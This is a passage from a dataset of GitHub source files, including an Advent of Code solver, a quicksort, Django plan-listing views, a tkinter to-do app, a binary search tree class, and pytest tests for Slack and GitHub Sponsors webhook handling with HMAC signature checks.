proxy","repo_name":"sparkwj/wenshu","sub_path":"wenshu/spiders/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":16790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74943893265","text":"from copy import deepcopy\nfrom typing import List\n\n\ndef add_padding(img: List[List[str]], size: int, val: str):\n for _ in range(size):\n img.insert(0, [val] * len(img[0]))\n img.append([val] * len(img[0]))\n for i in range(len(img)):\n img[i].insert(0, val)\n img[i].append(val)\n\n\ndef solve(enh: str, img: List[List[str]], steps: int):\n add_padding(img, 2, '.')\n for _ in range(steps):\n border = img[0][0]\n add_padding(img, 1, border)\n new_img = deepcopy(img)\n for i in range(len(new_img[0])):\n if border == '.':\n new_img[0][i] = enh[0]\n new_img[-1][i] = enh[0]\n else:\n new_img[0][i] = enh[-1]\n new_img[-1][i] = enh[-1]\n\n for i in range(len(new_img)):\n if border == '.':\n new_img[i][0] = enh[0]\n new_img[i][-1] = enh[0]\n else:\n new_img[i][0] = enh[-1]\n new_img[i][-1] = enh[-1]\n\n for i in range(1, len(new_img) - 1):\n for j in range(1, len(new_img[0]) - 1):\n square = img[i - 1][j - 1:j + 2] + img[i][j - 1:j + 2] + img[i + 1][j - 1:j + 2]\n bin_str = ''\n for e in square:\n bin_str += '0' if e == '.' else '1'\n idx = int(bin_str, 2)\n new_img[i][j] = enh[idx]\n img = new_img\n\n count = 0\n for row in img:\n count += row.count('#')\n print(count)\n\n\nif __name__ == '__main__':\n with open('test.txt', 'r') as file:\n input_lines = file.readlines()\n input_lines = [line.replace('\\r\\n', '').replace('\\n', '') for line in input_lines]\n\n enhancer = input_lines[0]\n\n image = []\n for ii in range(2, len(input_lines)):\n image.append(list(input_lines[ii]))\n\n solve(enhancer, image, 50)\n","repo_name":"gumbernator/Advent-of-Code-2021","sub_path":"day20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13616302427","text":"\"\"\"The manifold_utils module provides interfaces for manifold learning and dimensionality reduction.\n \n\"\"\"\n__author__ = (\"Bernhard Lehner \")\n\n\nfrom sklearn.manifold import TSNE\n\n\ndef tsne_embedding(X, n_dim=2, perplexity=3):\n tsne = TSNE(n_components=n_dim,\n init='random',\n perplexity=perplexity,\n learning_rate='auto')\n X_embedded = tsne.fit_transform(X)\n \n return X_embedded","repo_name":"berni-lehner/structural_health_monitoring","sub_path":"src/manifold_utils.py","file_name":"manifold_utils.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14102457909","text":"__author__ = \"Frank Shen\"\n\n\n# 递归实现\ndef quick_sort(seq):\n if len(seq) < 2:\n return seq\n else:\n pivot = seq[0]\n left = [elem for elem in seq[1:] if elem <= pivot]\n right = [elem for elem in seq[1:] if elem > pivot]\n return quick_sort(left) + [pivot] + quick_sort(right)\n\n\ndef test_quick_sort():\n import random\n ll = list(range(10))\n for i in range(10):\n random.shuffle(ll)\n assert quick_sort(ll) == list(range(10))\n\n\ntest_quick_sort()\n\n\n# def test_quick_sort():\n# import random\n# seq = list(range(10))\n# random.shuffle(seq)\n# print(quick_sort(seq))\n#\n#\n# test_quick_sort()\n#\n# def partition(array, beg, end):\n# pivot_index = beg\n# pivot = array[pivot_index]\n# left = pivot_index + 1\n# right = end - 1\n# while True:\n# while left <= right and array[left] < pivot:\n# left += 1\n#\n# while right >= left and array[right] >= pivot:\n# right -= 1\n# if left > right:\n# break\n# else:\n# array[left], array[right] = array[right], array[left]\n# array[pivot_index], array[right] = array[right], array[pivot_index]\n# return right\n#\n#\n# def quick_sort_inplace(array, beg, end):\n# if beg < end:\n# pivot = par\n","repo_name":"Frankssss/DataStructure-Algorithm","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10727955124","text":"from django.http import JsonResponse\nfrom django.views.generic import DetailView,TemplateView\nfrom plan.views import PlanDetailView,PlanView\nfrom django.views.generic.list import ListView\nfrom django.views.generic import DetailView\nfrom django.db.models import Q,Max\n\nfrom homepage.utils import get_context_obj\nfrom .models import FixedInternet\nfrom .forms import FixedInternetForm\nfrom .utils import donut_calculation\n\n\nclass FixedInternetHome(TemplateView):\n template_name = 'fixed_internet/fixed_internet_home.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form_class'] = FixedInternetForm()\n con = get_context_obj(self.request)\n context['obj'] = con['obj']\n context['country'] = con['country']\n return context\n\n\nclass FixedInternetList(PlanView):\n model = FixedInternet\n context_object_name = 'plans'\n template_name = 'fixed_internet/fixed_internet_listing.html'\n page_template = 'fixed_internet/fixed_internet_listing_template.html'\n\n def __init__(self):\n self.form_class = None\n\n super(FixedInternetList, self).__init__()\n\n def get_queryset(self):\n sort = self.request.GET.get(\"order_by\")\n\n data_range = self.request.GET.get('data')\n price_range = self.request.GET.get('price_range')\n selected_network = self.request.GET.get('selected_network')\n try:\n country = self.request.session.get('country')\n except:\n country = \"SA\"\n #\n qs = FixedInternet.active_fixed_internet.all()\n qs = qs.filter(country__country_code=country)\n\n\n if data_range:\n qs = qs.filter(Q(upload_speed__gte=int(data_range)))\n # #\n if price_range:\n qs = qs.filter(Q(monthly_fee__gte=int(price_range)))\n # #\n # if selected_network:\n #\n # qs = qs.filter(operator_id__operator=selected_network)\n # #\n # if sort:\n # qs = qs.order_by(sort)\n\n self.form_class = FixedInternetForm(self.request.GET, qs=qs,session = self.request.session)\n return qs\n\n\n def get(self, request, *args, **kwagrs):\n\n return super(FixedInternetList, self).get(request, *args, **kwagrs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n con = get_context_obj(self.request)\n context['obj'] = con['obj']\n context['country'] = con['country']\n context['form_class'] = self.form_class\n return donut_calculation(context)\n\n\nclass FixedInternetDetail(DetailView):\n template_name = 'fixed_internet/fixed_internet_detail.html'\n model = FixedInternet\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n con = get_context_obj(self.request)\n context['obj'] = con['obj']\n context['country'] = con['country']\n return context\n\n\ndef fixed_count(request):\n \"\"\"\n :param request: only_sim=on&phone_name=samsung1&phone_media=&phone_slug=&data=0&minutes=21&messages=0&\n selected_network=\n :return: count of plan\n \"\"\"\n\n data = request.GET.get('data', None)\n\n selected_network = request.GET.get('selected_network', None)\n try:\n country = request.session.get('country')\n except:\n country = \"SA\"\n\n qs = FixedInternet.active_fixed_internet.all()\n qs = qs.filter(country__country_code=country)\n\n if selected_network:\n qs = qs.filter(operator_id__operator=selected_network)\n\n if data:\n qs = qs.filter(Q(download_speed__gte=int(data)))\n\n return JsonResponse(qs.count(), status=200, safe=False)","repo_name":"Aravindhan-M/first_project","sub_path":"fixed_internet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13755101045","text":"import sys\nimport heapq\nfrom collections import deque\n\n\ndef solve():\n input = sys.stdin.readline\n\n N, K = map(int, input().split())\n\n jewel = [list(map(int, input().split())) for _ in range(N)]\n bag = [int(input()) for _ in range(K)]\n\n # 1. 보석 무게 순 정렬\n jewel = deque(sorted(jewel))\n # 2. 가방 무게 순 정렬\n bag.sort()\n # 3. 이미 들어갈 수 있는 무게라고 확인한 값들 중에 최대인 값 힙으로 저장\n max_heap = []\n\n ans = 0\n for i in range(K):\n while jewel:\n jewel_weight, jewel_value = jewel[0]\n if (bag[i] >= jewel_weight):\n heapq.heappush(max_heap, -jewel_value) # 최대 순으로 힙에 저장\n jewel.popleft()\n else:\n break\n if max_heap:\n ans += -(heapq.heappop(max_heap)) # 넣을 수 있는 값 중 최대 값 넣어줌\n print(ans)\n\n\nsolve()\n","repo_name":"Daejjyu/Algorithm","sub_path":"Jungle/Week4_Dp, Greedy/00_exam_3_1202_보석 도둑.py","file_name":"00_exam_3_1202_보석 도둑.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"38296148441","text":"from tkinter import *\nfrom tkinter import ttk\nimport time\nfrom tkinter import filedialog\nfrom typing import Literal\nimport json\n\n# from Tkinter import Widget\n# Widget._nametowidget(parent)\n\nfile = open('E:\\\\1.Python_f\\\\Glossory\\\\Tools_main_file\\\\tdlist\\\\info.json', 'a')\nroot = Tk()\nroot.geometry(\"500x500\")\n#Collapsible pane\nclass Cp(ttk.Frame):\n \"\"\"\n -----USAGE-----\n collapsiblePane = CollapsiblePane(parent,\n expanded_text =[string],\n collapsed_text =[string])\n\n collapsiblePane.pack()\n button = Button(collapsiblePane.frame).pack()\n \"\"\"\n\n def __init__(self, parent, expanded_text =\"Collapse <<\",\n collapsed_text =\"Expand >>\", expanding = False, name='cp'):\n\n ttk.Frame.__init__(self, parent, name=name)\n\n # These are the class variable\n # see a underscore in expanded_text and _collapsed_text\n # this means these are private to class\n self.parent = parent\n self.expanded_text = expanded_text\n self.collapsed_text = collapsed_text\n\n # Here weight implies that it can grow it's\n # size if extra space is available\n # default weight is 0\n self.columnconfigure(1, weight = 1)\n\n # Tkinter variable storing integer value\n self.variable = IntVar()\n\n # Checkbutton is created but will behave as Button\n # cause in style, Button is passed\n # main reason to do this is Button do not support\n # variable option but checkbutton do\n self.button = ttk.Checkbutton(self, variable = self.variable,\n command = self.activate, style =\"TButton\")\n self.button.grid(row = 0, column = 0)\n\n # This wil create a separator\n # A separator is a line, we can also set thickness\n self.separator = ttk.Separator(self, orient =\"horizontal\")\n self.separator.grid(row = 0, column = 1, sticky =\"we\")\n\n self.frame = ttk.Frame(self, name='special')\n\n # This will call activate function of class\n self.activate()\n\n\n if expanding:\n self.toggle()\n\n def activate(self):\n if not self.variable.get():\n\n # As soon as button is pressed it removes this widget\n # but is not destroyed means can be displayed again\n self.frame.grid_forget()\n\n # This will change the text of the checkbutton\n self.button.configure(text = self.collapsed_text)\n\n elif self.variable.get():\n # increasing the frame area so new widgets\n # could reside in this container\n self.frame.grid(row = 1, column = 0, columnspan = 2)\n self.button.configure(text = self.expanded_text)\n\n def toggle(self, _state = 'default'):\n \"\"\"Switches the label frame to the opposite state.\"\"\"\n self.variable.set(not self.variable.get())\n if _state != 'default':\n self.variable.set(_state)\n self.activate()\n\ndic = {}\n\nclass autoE(Entry):\n \"\"\"please don't make fontcolor same to placecolor\"\"\"\n def __init__(self, parent, placeholder=None, placecolor='gray', fontcolor='black', only=Literal['None', 'Num', 'Text'], limit=int, space=True, quote=True, **arg):\n Entry.__init__(self, parent, fg=placecolor, **arg)\n self.bind(\"\", self.click)\n self.bind(\"\", self.out)\n self.bind(\"\", self.check)\n self.ph = placeholder\n self.fontc = fontcolor\n self.only = only\n self.limit = limit\n \n self.num = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\n self.text = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n self.quote = \"\"\"[ ! @ # $ % ^ & * ( ) , . / < > ? ; ' \\ : ` ~ - = _ +\"\"\"\n if space:\n self.num.append(' ')\n self.text.append(' ')\n if quote:\n self.num.extend(self.quote.split(' '))\n self.text.extend(self.quote.split(' ')) \n self.placecolor = placecolor\n self.insert(END, self.ph)\n\n def click(self, e):\n if self.get() == self.ph and self['fg'] == self.placecolor:\n self.delete(0, END)\n self['fg'] = self.fontc\n def out(self, e):\n if not self.get():\n self['fg'] = self.placecolor\n self.insert(END, self.ph)\n def check(self, e):\n s = ''\n if self.only == 'Num':\n \n for w in self.get():\n if w in self.num:\n s += w\n try:\n s = s[:self.limit]\n except TypeError:\n pass\n self.delete(0, END)\n self.insert(END, s)\n elif self.only == 'Text':\n for w in self.get():\n if w in self.text:\n s += w\n try:\n s = s[:self.limit]\n except TypeError:\n pass\n self.delete(0, END)\n self.insert(END, s)\n return\n\n##### ENDED ON trying to change the task from doing to finished. Since the master cannnot be changed, working on\n##### to collect all the info of each widget in the task and moving it to the opposite pane. The get funtion will\n##### trying to get the parents, the widget info and everything. Trying to work on that. Haven't finished yet.\n\ndef get(e):\n n = e.widget.winfo_parent()\n \n # n = n[0:-1]\n # n = '.'.join(n)\n print(n)\n get = [x for x in e.widget.config()]\n dic[e.widget] = {}\n for x in get:\n d = e.widget.cget(x)\n dic[e.widget][x] = d\n \n # s = \"\"\n n = root.nametowidget(n)\n n.destroy()\n # \n # n['parent'] = Fini_cf\n return\ncount = 0\n\ndef add_task(e):\n global count\n task = mainE.get()\n if task:\n tf = Frame(Undo_cf, name=task.lower()+'-frame'+str(count))\n tf.pack(anchor='w')\n # var = StringVar()\n # for x in range(0, 10):\n check = ttk.Checkbutton(tf, text=task, variable=StringVar(), name=task.lower()+'-check'+str(count))\n check.state(['!alternate'])\n check.pack(padx=20)\n count += 1\n check.bind('', get)\n \n \n on_configure(None)\n return\n\ndef on_configure(event):\n # update scrollregion after starting 'mainloop'\n # when all widgets are in canvas\n canvas.configure(scrollregion=canvas.bbox('all'))\n Undo_c.configure(scrollregion=Undo_c.bbox('all'))\n Fini_c.configure(scrollregion=Fini_c.bbox('all'))\n return\n\ndef _on_mousewheel(event):\n print(event, event.delta)\n print(event.widget)\n sx, sy = scrollbar.get()\n if 'undo_cf' in str(event.widget):\n Undo_c.yview_scroll(-1*int((event.delta/120)), \"units\")\n if 1.0 in Undo_s.get() and event.delta == -120 or 0.0 in Undo_s.get() and event.delta == 120:\n canvas.yview_scroll(-1*int((event.delta/120)), \"units\")\n return\n elif 'fini_cf' in str(event.widget):\n Fini_c.yview_scroll(-1*int((event.delta/120)), \"units\")\n if 1.0 in Fini_s.get() and event.delta == -120 or 0.0 in Fini_s.get() and event.delta == 120:\n Fini_c.yview_scroll(-1*int((event.delta/120)), \"units\")\n return\n if sx == 0.0 and sy == 1.0:\n return\n canvas.yview_scroll(-1*int((event.delta/120)), \"units\")\n return\n\ndef FrameWidth(event):\n canvas_width = event.width\n canvas.itemconfig(canva_frame, width = canvas_width)\n Undo_c['width'] = canvas_width -50\n Undo_c.itemconfig(Undo_cff, width=canvas_width-50)\n Undo_c['height'] = root.winfo_height()-200\n Fini_c['width'] = canvas_width -50\n Fini_c.itemconfig(Fini_cff, width=canvas_width-50)\n Fini_c['height'] = root.winfo_height()-200\n return\n\nFone = Frame(root, name='fone')\nFone.pack(anchor='center')\n\ncanvas = Canvas(root, name='main_canvas')\ncanvas.pack(side=LEFT, fill=BOTH, expand=True)\n\nscrollbar = Scrollbar(root, command=canvas.yview, name='main_scrollbar')\nscrollbar.pack(side=RIGHT, fill=Y)\n\n# scrollbar.bind('', on_configure)\n# canvas.bind('', on_configure)\n\ncanvas.configure(yscrollcommand = scrollbar.set)\n\ncanvas.bind('', on_configure)\n\nTaskF = Frame(canvas, name='taskf')\n# TaskF.pack(expand=True, fill=BOTH)\ncanva_frame = canvas.create_window((0,0), window=TaskF, anchor='nw')\ncanvas.bind('', FrameWidth)\ncanvas.bind_all(\"\", _on_mousewheel)\n# TaskF = Frame(root)\n# TaskF.pack(anchor='w', padx=50, pady=50)\n\nmainE = Entry(Fone, width=50, name='maine')\nmainE.grid(row=0, column=0)\nmainE.bind(\"\", lambda x: maincp.toggle(_state=1))\nmainE.bind(\"\", add_task)\n\naddB = Button(Fone, text='+', font='times, 20', name='addb')\naddB.grid(row=0, column=1, padx=10)\n# addB.bind(\"\", add_task)\n\nmaincp = Cp(Fone, expanded_text='Description____________', collapsed_text='Description------------------', expanding=False, name='maincp')\nmainT = Text(maincp.frame, height=5, width=50, name='maint')\nmainT.grid(row=10, column=0, sticky='w')\nmaincp.grid(row=3, columnspan=2, sticky='w')\n\ndue = Frame(maincp.frame)\ndue.grid(row=1, columnspan=2)\n\nminute_e = autoE(due, 'min', only='Num', limit=2, space=False, quote=False, width=4)\nminute_e.grid(row=0, column=2)\n\nlab = Label(due, text=':')\nlab.grid(row=0, column=1)\n\nhour_e = autoE(due, 'hour', only='Num', limit=2, space=False, quote=False, width=4)\nhour_e.grid(row=0, column=0)\n\nday_e = autoE(due, 'day', only='Num', space=False, quote=False, limit=2, width=4)\nday_e.grid(row=0, column=5, pady=10, padx=20)\n\nmonth_e = autoE(due, placeholder='month', only='Num', space=False, quote=False, limit=2, width=6)\nmonth_e.grid(row=0, column=4)\n\nyear_e = autoE(due, placeholder='year', only='Num', limit=4, space=False, quote=False, width=4)\nyear_e.grid(row=0, column=3, padx=20)\n\npriF = Frame(maincp.frame)\npriF.grid(row=2, columnspan=2)\n\ndef fore(e):\n \n for b in radio:\n b['foreground'] = 'white'\n if e == \"de\":\n pri.set(0)\n return\n e.widget['foreground'] = 'black'\n\npri = IntVar()\ncolor = ['None', 'red', 'blue', 'green', 'brown', 'gray']\nradio = []\nfor x in range(1, 6):\n pri_O = Radiobutton(priF, variable=pri, text='priority ' + str(x), indicatoron=0, background=color[x], value=x, foreground='white', selectcolor='yellow')\n pri_O.bind('', fore)\n pri_O.grid(row=0, column=x)\n radio.append(pri_O)\npri_Od = Button(priF, text='No priority', command= lambda: fore(\"de\"), bg='pink', fg='black')\npri_Od.grid(row=0, column=6, padx=5, pady=5)\n\n\n\nUNDO = Cp(TaskF, expanded_text =\">>Unfinished Works\", collapsed_text =\"<', FrameWidth)\n\nUndo_s = Scrollbar(Undo_f, command=Undo_c.yview, name='undo_s')\nUndo_s.pack(side=RIGHT, fill='y')\n\nUndo_cf = Frame(Undo_c, name='undo_cf', bg='white')\nUndo_cff = Undo_c.create_window((0,0), window=Undo_cf, anchor='nw')\n\nUndo_c.configure(yscrollcommand=Undo_s.set)\n\n\nUndo_c.bind('', on_configure)\n\n\n\n\n\nFINI = Cp(TaskF, expanded_text='>>Finished', collapsed_text='<', FrameWidth)\n\nFini_s = Scrollbar(Fini_f, command=Fini_c.yview, name='fini_s')\nFini_s.pack(side=RIGHT, fill='y')\n\nFini_cf = Frame(Fini_c, name='fini_cf', bg='white')\nFini_cff = Fini_c.create_window((0,0), window=Fini_cf, anchor='nw')\n\nFini_c.configure(yscrollcommand=Fini_s.set)\n\n\nFini_c.bind('', on_configure)\n\n\n\n\n\n\n\n\n\n\n\n\n\nUndo_f.bind(\"\", on_configure)\nFini_f.bind(\"\", on_configure)\nUNDO.bind(\"\", on_configure)\nFINI.bind(\"\", on_configure)\n\n\n\n\n\n\n\n\n\n\n\n\nroot.mainloop()","repo_name":"Today100/Glossary","sub_path":"Tools_main_file/Pending/tdlist(pending)/trial2.py","file_name":"trial2.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27017269023","text":"'''\nA BT is one of\nBT(Number, BT, BT)\nNone\n'''\nclass InvalidBinTreeError(Exception):\n pass\n\n\nclass BT:\n def __init__(self, num, left=None, right=None):\n # input validation\n if not (isinstance(left, BT) or left == None):\n raise InvalidBinTreeError(\"left tree is not a valid BT: {0}\".format(left))\n if not (isinstance(right, BT) or right == None):\n raise InvalidBinTreeError(\"right tree is not a valid BT: {0}\".format(right))\n\n self.num = num\n self.left = left\n self.right = right\n\n def flatten(self):\n '''returns a list with all nodes, using infix'''\n if self.left == None and self.right == None:\n return [self.num]\n elif self.left == None and isinstance(self.right, BT):\n return [self.num] + self.right.flatten()\n elif isinstance(self.left, BT) and self.right == None:\n return self.left.flatten() + [self.num]\n else:\n return self.left.flatten() + [self.num] + self.right.flatten()\n\n def __str__(self):\n if self.left == None and self.right == None:\n return \"({0}, (), ())\".format(self.num)\n elif self.left == None:\n return \"({0}, (), {1})\".format(self.num, str(self.right))\n elif self.right == None:\n return \"({0}, {1}, ())\".format(self.num, str(self.left))\n else:\n return \"({0}, {1}, {2})\".format(self.num, str(self.left), str(self.right))\n\n def __eq__(self, other):#\n if other == None:\n return False\n else:\n return self.num == other.num and self.left == other.left and self.right == other.right\n\n def clone(self):\n if self.left == None and self.right == None:\n return BT(self.num)\n elif self.left == None:\n return BT(self.num, None, self.right.clone())\n elif self.right == None:\n return BT(self.num, self.left.clone(), None)\n else:\n # both branches are trees\n return BT(self.num, self.left.clone(), self.right.clone())\n\n\nclass UnorderedBSTError(Exception):\n pass\n\n\nclass BST(BT):\n def __init__(self, num, left=None, right=None):\n super().__init__(num, left, right)\n # validate tree structure\n if not self.isValid():\n raise UnorderedBSTError(\"BST is not properly ordered\")\n\n def isValid(self):\n '''is the tree a valid binary search tree?'''\n flattened = self.flatten()\n for i in range(0, len(flattened) - 1):\n if not flattened[i] < flattened[i + 1]:\n return False\n return True\n\n def __contains__(self, ele):\n if ele == self.num:\n return True\n elif ele < self.num:\n if self.left == None:\n return False\n else:\n # there's a left tree and it might be there\n return ele in self.left\n elif ele > self.num:\n if self.right == None:\n return False\n else:\n # there's a right tree and it might be there\n return ele in self.right\n else:\n return False\n\n def getPath(self, ele):#\n # assume it's in the tree\n if ele == self.num:\n return \"/{0}\".format(self.num)\n elif ele < self.num:\n return \"/{0}{1}\".format(self.num, self.left.getPath(ele))\n elif ele > self.num:\n return \"/{0}{1}\".format(self.num, self.right.getPath(ele))\n","repo_name":"quasarbright/quasarbright.github.io","sub_path":"python/binTree/binTree.py","file_name":"binTree.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4544750715","text":"import binascii\nimport hashlib\nimport hmac\nimport json\nimport time\nfrom typing import Dict\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom django.test import Client, RequestFactory\nfrom django.urls import reverse\nfrom pytest_django.fixtures import SettingsWrapper\n\nfrom blossom.api.slack import client as slack_client\nfrom blossom.api.slack.actions import is_valid_github_request, process_action\nfrom blossom.api.views.slack import github_sponsors_endpoint\n\n# TODO: There is a way to mock decorators, but I can't figure it out.\n# There's a lot of testing that needs to happen for this module, but I can't\n# get past the threading decorator and the patch calls don't seem to work.\n# Resources:\n# https://stackoverflow.com/questions/7667567/can-i-patch-a-python-decorator-before-it-wraps-a-function # noqa: E501\n# http://alexmarandon.com/articles/python_mock_gotchas/\n# https://stackoverflow.com/questions/36812830/mocking-decorators-in-python-with-mock-and-pytest # noqa: E501\n\n# NOTE: In order to test slack, you must add the `settings` hook and set\n# `settings.ENABLE_SLACK = True`. MAKE SURE that if you're writing a new\n# test that uses ENABLE_SLACK that you patch `requests.post` or it will\n# try and ping modchat (if you're running locally) or explode if this is\n# running in the github actions pipeline.\n\nSLACK_SIGNING_SECRET = \"12345\"\n\n\ndef get_slack_headers(body: dict, settings: SettingsWrapper) -> dict:\n \"\"\"Mock the headers required by slack validation.\"\"\"\n create_time = str(int(time.time()))\n\n body = json.dumps(body)\n sig_basestring = \"v0:\" + create_time + \":\" + body\n signature = (\n \"v0=\"\n + hmac.new(\n bytes(settings.SLACK_SIGNING_SECRET, \"latin-1\"),\n msg=bytes(sig_basestring, \"latin-1\"),\n digestmod=hashlib.sha256,\n ).hexdigest()\n )\n\n return {\n \"HTTP_X-Slack-Signature\": signature,\n \"HTTP_X-Slack-Request-Timestamp\": create_time,\n }\n\n\ndef test_challenge_request(client: Client, settings: SettingsWrapper) -> None:\n \"\"\"Test handling of Slack's new endpoint challenge message.\"\"\"\n settings.SLACK_SIGNING_SECRET = SLACK_SIGNING_SECRET\n data = {\"challenge\": \"asdfasdfasdf\"}\n headers = get_slack_headers(data, settings)\n result = client.post(\n reverse(\"slack\"), json.dumps(data), content_type=\"application/json\", **headers\n )\n assert result.content == b\"asdfasdfasdf\"\n\n\n@pytest.mark.parametrize(\n \"test_data\",\n [\n {\"data\": {\"aaa\": \"bbb\"}, \"signature\": \"nope\", \"result\": False},\n {\n \"data\": {\"bbb\": \"ccc\"},\n \"signature\": \"sha1=757fc3cb2f66db92a1d164c116358660e4e7656e\",\n \"result\": True,\n },\n {\"data\": {\"aaa\": \"bbb\"}, \"signature\": \"sha1=ttthhhbbbttt\", \"result\": False},\n {\"data\": {\"aaa\": \"bbb\"}, \"signature\": None, \"result\": True},\n ],\n)\ndef test_is_github_valid_request(\n rf: RequestFactory, settings: SettingsWrapper, test_data: Dict\n) -> None:\n \"\"\"Test to ensure that a webhook from GitHub Sponsors is valid.\"\"\"\n request = rf.post(\n \"slack/github/sponsors/\",\n data=test_data[\"data\"],\n content_type=\"application/json\",\n )\n\n settings.GITHUB_SPONSORS_SECRET_KEY = \"shhh, it's a secret\"\n\n if not test_data[\"signature\"]:\n test_data[\"signature\"] = \"sha1={}\".format(\n binascii.hexlify(\n hmac.digest(\n msg=request.body,\n key=settings.GITHUB_SPONSORS_SECRET_KEY.encode(),\n digest=\"sha1\",\n )\n ).decode()\n )\n\n request.headers = {\"x-hub-signature\": test_data[\"signature\"]}\n assert is_valid_github_request(request) is test_data[\"result\"]\n\n\ndef test_github_missing_signature(rf: RequestFactory) -> None:\n \"\"\"Test to ensure a request that is missing the signature is marked invalid.\"\"\"\n \"\"\"Test to ensure that a webhook from GitHub Sponsors is valid.\"\"\"\n request = rf.post(\n \"slack/github/sponsors/\", data={\"aaa\": \"bbb\"}, content_type=\"application/json\"\n )\n assert is_valid_github_request(request) is False\n\n\n@pytest.mark.parametrize(\n \"test_data\",\n [\n {\n \"username\": \"bob\",\n \"tier\": \"A\",\n \"action\": \"created\",\n \"result\": \":tada: GitHub Sponsors: [created] - bob | A :tada:\",\n \"status_code\": 200,\n },\n {\n \"username\": \"bobbert\",\n \"tier\": \"B\",\n \"action\": \"cancelled\",\n \"result\": \":sob: GitHub Sponsors: [cancelled] - bobbert | B :sob:\",\n \"status_code\": 200,\n },\n {\n \"username\": \"bobby\",\n \"tier\": \"C\",\n \"action\": \"edited\",\n \"result\": (\":rotating_light: GitHub Sponsors: [edited] - bobby | C :rotating_light:\"),\n \"status_code\": 200,\n },\n ],\n)\ndef test_github_sponsor_slack_message(\n rf: RequestFactory, settings: SettingsWrapper, test_data: Dict\n) -> None:\n \"\"\"Test to ensure webhooks from GitHub Sponsors trigger appropriate slack pings.\"\"\"\n slack_client.chat_postMessage = MagicMock()\n request = rf.post(\n \"slack/github/sponsors/\",\n data={\n \"action\": test_data[\"action\"],\n \"sponsorship\": {\n \"sponsor\": {\"login\": test_data[\"username\"]},\n \"tier\": {\"name\": test_data[\"tier\"]},\n },\n },\n content_type=\"application/json\",\n )\n request.headers = {\n \"x-hub-signature\": \"sha1={}\".format(\n binascii.hexlify(\n hmac.digest(\n msg=request.body,\n key=settings.GITHUB_SPONSORS_SECRET_KEY.encode(),\n digest=\"sha1\",\n )\n ).decode()\n )\n }\n response = github_sponsors_endpoint(request)\n\n assert slack_client.chat_postMessage.call_args[1][\"text\"] == test_data[\"result\"]\n assert response.status_code == test_data[\"status_code\"]\n\n\ndef test_process_action_check() -> None:\n \"\"\"Test that a check action is routed correctly.\"\"\"\n data = {\n \"channel\": {\"id\": \"C065W1189\", \"name\": \"forgotten-works\"},\n \"actions\": [{\"name\": \"Approve\", \"value\": \"check_approved_1\", \"type\": \"button\"}],\n \"user\": {\"id\": \"U045VRZFT\", \"name\": \"Modulo\"},\n \"message_ts\": \"1458170866.000004\",\n }\n\n with patch(\n \"blossom.api.slack.actions.process_check_action\", return_value=None\n ) as check_mock, patch(\n \"blossom.api.slack.actions.process_submission_report_update\"\n ) as report_mock, patch(\n \"blossom.api.slack.actions.client.chat_postMessage\"\n ) as message_mock:\n process_action(data)\n\n assert check_mock.call_count == 1\n assert report_mock.call_count == 0\n assert message_mock.call_count == 0\n\n\ndef test_process_action_report() -> None:\n \"\"\"Test that a report action is routed correctly.\"\"\"\n data = {\n \"channel\": {\"id\": \"C065W1189\", \"name\": \"forgotten-works\"},\n \"actions\": [{\"name\": \"Approve\", \"value\": \"approve_submission_3\", \"type\": \"button\"}],\n \"user\": {\"id\": \"U045VRZFT\", \"name\": \"Modulo\"},\n \"message_ts\": \"1458170866.000004\",\n }\n\n with patch(\n \"blossom.api.slack.actions.process_check_action\", return_value=None\n ) as check_mock, patch(\n \"blossom.api.slack.actions.process_submission_report_update\"\n ) as report_mock, patch(\n \"blossom.api.slack.actions.client.chat_postMessage\"\n ) as message_mock:\n process_action(data)\n\n assert check_mock.call_count == 0\n assert report_mock.call_count == 1\n assert message_mock.call_count == 0\n\n\ndef test_process_action_unknown() -> None:\n \"\"\"Test that an error message is sent for an unknown action.\"\"\"\n data = {\n \"channel\": {\"id\": \"C065W1189\", \"name\": \"forgotten-works\"},\n \"actions\": [{\"name\": \"Approve\", \"value\": \"asdas\", \"type\": \"button\"}],\n \"user\": {\"id\": \"U045VRZFT\", \"name\": \"Modulo\"},\n \"message_ts\": \"1458170866.000004\",\n }\n\n with patch(\n \"blossom.api.slack.actions.process_check_action\", return_value=None\n ) as check_mock, patch(\n \"blossom.api.slack.actions.process_submission_report_update\"\n ) as report_mock, patch(\n \"blossom.api.slack.actions.client.chat_postMessage\"\n ) as message_mock:\n process_action(data)\n\n assert check_mock.call_count == 0\n assert report_mock.call_count == 0\n assert message_mock.call_count == 1\n","repo_name":"GrafeasGroup/blossom","sub_path":"blossom/api/tests/slack/test_actions.py","file_name":"test_actions.py","file_ext":"py","file_size_in_byte":8473,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"16336723552","text":"#! /usr/bin/env python3\n\nimport sys, glob\nfrom qe_tokenization import perform_tokenization\nimport 